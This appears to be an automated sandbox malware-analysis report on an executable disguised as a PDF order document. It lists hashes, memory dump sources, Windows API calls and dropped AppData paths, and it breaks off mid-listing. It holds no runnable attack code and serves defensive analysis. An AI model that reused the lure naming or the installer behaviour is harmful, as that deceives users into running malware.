                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2972824698-0
                                                                                                                                        • Opcode ID: b5715756e82aacef9dba35480b317cef67fa4a28b9ebd8b0c2191e4f0fbd53e2
                                                                                                                                        • Instruction ID: 38ff014a8e4085178bb50f003d2faa90d0cc15d8516b8928bc727fcbc0eca729
                                                                                                                                        • Opcode Fuzzy Hash: b5715756e82aacef9dba35480b317cef67fa4a28b9ebd8b0c2191e4f0fbd53e2
                                                                                                                                        • Instruction Fuzzy Hash: 20F0B432905021EBCB20BFA59D84AEFB2A5DF01319B24463FF102B61D1CB7C4E425A6E
                                                                                                                                        APIs
                                                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00403644,?,?,00000007,00000009,0000000B), ref: 00403818
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                        • Opcode ID: 203254b4b952498bcfb426d07e946647441d2fe85a9017f9f34946e1d1af236a
                                                                                                                                        • Instruction ID: 70899941626206ae6593ea46f51f68263bc92dff29c150bed4396ff8d4ee1535
                                                                                                                                        • Opcode Fuzzy Hash: 203254b4b952498bcfb426d07e946647441d2fe85a9017f9f34946e1d1af236a
                                                                                                                                        • Instruction Fuzzy Hash: 12C0123154070496C120BF749D4F5193B94AB45335B94877DB0F5B00F0CB7C4A6A465A
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404639
                                                                                                                                        • SetWindowTextA.USER32(00000000,?), ref: 00404663
                                                                                                                                        • SHBrowseForFolderA.SHELL32(?,0079E940,?), ref: 00404714
                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 0040471F
                                                                                                                                        • lstrcmpiA.KERNEL32(: Completed,0079F568), ref: 00404751
                                                                                                                                        • lstrcatA.KERNEL32(?,: Completed), ref: 0040475D
                                                                                                                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040476F
                                                                                                                                          • Part of subcall function 004057D4: GetDlgItemTextA.USER32(?,?,00000400,004047A6), ref: 004057E7
                                                                                                                                          • Part of subcall function 004063AF: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406407
                                                                                                                                          • Part of subcall function 004063AF: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406414
                                                                                                                                          • Part of subcall function 004063AF: CharNextA.USER32(?,"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406419
                                                                                                                                          • Part of subcall function 004063AF: CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406429
                                                                                                                                        • GetDiskFreeSpaceA.KERNEL32(0079E538,?,?,0000040F,?,0079E538,0079E538,?,00000001,0079E538,?,?,000003FB,?), ref: 0040482D
                                                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404848
                                                                                                                                          • Part of subcall function 004049A1: lstrlenA.KERNEL32(0079F568,0079F568,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048BC,000000DF,00000000,00000400,?), ref: 00404A3F
                                                                                                                                          • Part of subcall function 004049A1: wsprintfA.USER32 ref: 00404A47
                                                                                                                                          • Part of subcall function 004049A1: SetDlgItemTextA.USER32(?,0079F568), ref: 00404A5A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                        • String ID: Clona $$8y$: Completed$A$C:\Users\user\AppData\Roaming\skittaget\lektier
                                                                                                                                        • API String ID: 2624150263-2665192967
                                                                                                                                        • Opcode ID: a4aefe8a33941754a38210bdfdb67fad9402d671bf1433dcbf252a6a4ee896ac
                                                                                                                                        • Instruction ID: 0969ed353920fe7c0c653b0854d10b45f8508fdea16f9d8b9f06e94c3a270cc6
                                                                                                                                        • Opcode Fuzzy Hash: a4aefe8a33941754a38210bdfdb67fad9402d671bf1433dcbf252a6a4ee896ac
                                                                                                                                        • Instruction Fuzzy Hash: 80A17FB1900208ABDB11EFA5CD85AAF77B8EF85314F14843BF701B62D1D77C8A518B69
                                                                                                                                        APIs
                                                                                                                                        • DeleteFileA.KERNEL32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058C5
                                                                                                                                        • lstrcatA.KERNEL32(007A0570,\*.*,007A0570,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040590D
                                                                                                                                        • lstrcatA.KERNEL32(?,0040A014,?,007A0570,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040592E
                                                                                                                                        • lstrlenA.KERNEL32(?,?,0040A014,?,007A0570,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405934
                                                                                                                                        • FindFirstFileA.KERNEL32(007A0570,?,?,?,0040A014,?,007A0570,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405945
                                                                                                                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004059F2
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00405A03
                                                                                                                                        Strings
                                                                                                                                        • "C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe", xrefs: 0040589C
                                                                                                                                        • \*.*, xrefs: 00405907
                                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004058A9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                        • String ID: "C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                        • API String ID: 2035342205-866183248
                                                                                                                                        • Opcode ID: 9393b2adcb6d8846d5ff8c884456c1fb2c6b7946f01c0648e6f841e18f88bca0
                                                                                                                                        • Instruction ID: ff286dc4e0ddd5c67b21a0dc49aadedac0e09a5b28e8edd6ac2018649726c89b
                                                                                                                                        • Opcode Fuzzy Hash: 9393b2adcb6d8846d5ff8c884456c1fb2c6b7946f01c0648e6f841e18f88bca0
                                                                                                                                        • Instruction Fuzzy Hash: 9C51B071900A04AADF21AB65CC86BBF7B68DF46724F14823BF441B51D2C73C4A82DF69
                                                                                                                                        APIs
                                                                                                                                        • CoCreateInstance.OLE32(00408418,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                                                                                        Strings
                                                                                                                                        • C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111, xrefs: 00402230
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                        • String ID: C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111
                                                                                                                                        • API String ID: 123533781-619757925
                                                                                                                                        • Opcode ID: cc6f848e1b62abadab8e006f4452da0e78099bc8968069d3cce75adc38b3ee25
                                                                                                                                        • Instruction ID: 66478de832771c1020eecb70c9dea3013e0956f30c68bb444eb5f27a96bb8e2b
                                                                                                                                        • Opcode Fuzzy Hash: cc6f848e1b62abadab8e006f4452da0e78099bc8968069d3cce75adc38b3ee25
                                                                                                                                        • Instruction Fuzzy Hash: DC511671A00208AFCB00DFE4C988E9D7BB6FF48314F2041BAF515EB2D1DA799981CB14
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1974802433-0
                                                                                                                                        • Opcode ID: 7f756400988a11a576d96bcb330f7db73c3d2f4761ae35ba5f018229d3e87ddf
                                                                                                                                        • Instruction ID: 501d16c749f80da14ed264ffe4d7962c3458ff385ba500142fb475b890c78c7d
                                                                                                                                        • Opcode Fuzzy Hash: 7f756400988a11a576d96bcb330f7db73c3d2f4761ae35ba5f018229d3e87ddf
                                                                                                                                        • Instruction Fuzzy Hash: E5F0A771644110DED700EB649A49AEE77689F51314F20457BF102B20C1D6B84A46972A
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404B74
                                                                                                                                        • GetDlgItem.USER32(?,00000408), ref: 00404B81
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000001), ref: 00404BD0
                                                                                                                                        • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404BE7
                                                                                                                                        • SetWindowLongA.USER32(?,000000FC,0040516F), ref: 00404C01
                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C13
                                                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C27
                                                                                                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404C3D
                                                                                                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C49
                                                                                                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C59
                                                                                                                                        • DeleteObject.GDI32(00000110), ref: 00404C5E
                                                                                                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404C89
                                                                                                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404C95
                                                                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D2F
                                                                                                                                        • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D5F
                                                                                                                                          • Part of subcall function 0040418D: SendMessageA.USER32(00000028,?,00000001,00403FBD), ref: 0040419B
                                                                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D73
                                                                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404DA1
                                                                                                                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404DAF
                                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404DBF
                                                                                                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EBA
                                                                                                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F1F
                                                                                                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F34
                                                                                                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F58
                                                                                                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F78
                                                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404F8D
                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00404F9D
                                                                                                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405016
                                                                                                                                        • SendMessageA.USER32(?,00001102,?,?), ref: 004050BF
                                                                                                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050CE
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004050F8
                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00405146
                                                                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00405151
                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00405158
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                        • String ID: $M$N
                                                                                                                                        • API String ID: 2564846305-813528018
                                                                                                                                        • Opcode ID: 90a3f73bba2d9c8e7cacb4b794b53442a440f171c96f1b4cbc8b508420429673
                                                                                                                                        • Instruction ID: 01e3f0ac69fe039d53c66122a0ee2819e5ae0f579c243cd3ce02c20529578500
                                                                                                                                        • Opcode Fuzzy Hash: 90a3f73bba2d9c8e7cacb4b794b53442a440f171c96f1b4cbc8b508420429673
                                                                                                                                        • Instruction Fuzzy Hash: AC025BB0900209AFDB10DFA8DD45AAE7BB5FB84354F10813AF610BA2E1D7799D52CF58
                                                                                                                                        APIs
                                                                                                                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040434E
                                                                                                                                        • GetDlgItem.USER32(00000000,000003E8), ref: 00404362
                                                                                                                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404380
                                                                                                                                        • GetSysColor.USER32(?), ref: 00404391
                                                                                                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043A0
                                                                                                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043AF
                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 004043B2
                                                                                                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043C1
                                                                                                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043D6
                                                                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404438
                                                                                                                                        • SendMessageA.USER32(00000000), ref: 0040443B
                                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404466
                                                                                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044A6
                                                                                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 004044B5
                                                                                                                                        • SetCursor.USER32(00000000), ref: 004044BE
                                                                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 004044D4
                                                                                                                                        • SetCursor.USER32(00000000), ref: 004044D7
                                                                                                                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404503
                                                                                                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404517
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                        • String ID: : Completed$N
                                                                                                                                        • API String ID: 3103080414-2140067464
                                                                                                                                        • Opcode ID: 89bfaba4aad14bbdc3ef2aca23760d41403bea85feb245a06943091ca1e46a07
                                                                                                                                        • Instruction ID: 9df2d5718f770f504e0a3d1761d641f71338e4c23cddda8a7d5dd424fc5a0579
                                                                                                                                        • Opcode Fuzzy Hash: 89bfaba4aad14bbdc3ef2aca23760d41403bea85feb245a06943091ca1e46a07
                                                                                                                                        • Instruction Fuzzy Hash: 2A61B1B1A40208BFDF109F60DD45F6A3B69FB84715F10802AFB05BA2D1D7B8A951CF99
                                                                                                                                        APIs
                                                                                                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                        • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                        • DrawTextA.USER32(00000000,Bysamfund,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
